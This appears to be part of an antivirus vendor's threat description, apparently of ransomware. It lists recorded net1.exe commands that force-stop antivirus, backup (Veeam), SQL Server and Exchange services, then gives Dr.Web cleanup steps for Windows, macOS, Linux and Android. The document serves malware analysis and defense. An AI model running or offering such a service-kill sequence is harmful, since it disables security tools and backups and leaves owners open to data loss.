  • '<SYSTEM32>\net1.exe' stop MSExchangeMGMT /y
  • '<SYSTEM32>\net1.exe' stop kavfsslp /y
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop klnagent /y
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop KAVFS /y
  • '<SYSTEM32>\net1.exe' stop BMR Boot Service /y
  • '<SYSTEM32>\net1.exe' stop ESHASRV /y
  • '<SYSTEM32>\net1.exe' stop SDRSVC /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$VEEAMSQL2012 /y
  • '<SYSTEM32>\net1.exe' stop FA_Scheduler /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop vapiendpoint /y
  • '<SYSTEM32>\net1.exe' stop tmlisten /y
  • '<SYSTEM32>\net1.exe' stop SQLSafeOLRService /y
  • '<SYSTEM32>\net1.exe' stop TrueKey /y
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT /y
  • '<SYSTEM32>\net1.exe' stop TrueKeyScheduler /y
  • '<SYSTEM32>\net1.exe' stop SQLTELEMETRY /y
  • '<SYSTEM32>\net1.exe' stop TrueKeyServiceHelper /y
  • '<SYSTEM32>\net1.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop WRSVC /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer110 /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop POP3Svc /y
  • '<SYSTEM32>\net1.exe' stop VeeamBackupSvc /y
  • '<SYSTEM32>\net1.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Clean Service” /y
  • '<SYSTEM32>\net1.exe' stop SMTPSvc /y
  • '<SYSTEM32>\net1.exe' stop “SQLsafe Backup Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer /y
  • '<SYSTEM32>\net1.exe' stop SamSs /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer100 /y
  • '<SYSTEM32>\net1.exe' stop NetMsmqActivator /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos AutoUpdate Service” /y
  • '<SYSTEM32>\net1.exe' stop McAfeeEngineService /y
  • '<SYSTEM32>\net1.exe' stop “SQL Backups /y
  • '<SYSTEM32>\net1.exe' stop MBAMService /y
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLSERVER /y
  • '<SYSTEM32>\net1.exe' stop MBEndpointAgent /y
  • '<SYSTEM32>\net1.exe' stop VeeamEnterpriseManagerSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper /y
  • '<SYSTEM32>\net1.exe' stop masvc /y
  • '<SYSTEM32>\net1.exe' stop VeeamDeploymentService /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop macmnsvc /y
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$TPS /y
  • '<SYSTEM32>\net1.exe' stop SQLWriter /y
  • '<SYSTEM32>\net1.exe' stop KAVFSGT /y
  • '<SYSTEM32>\net1.exe' stop stc_raw_agent /y

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.


  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
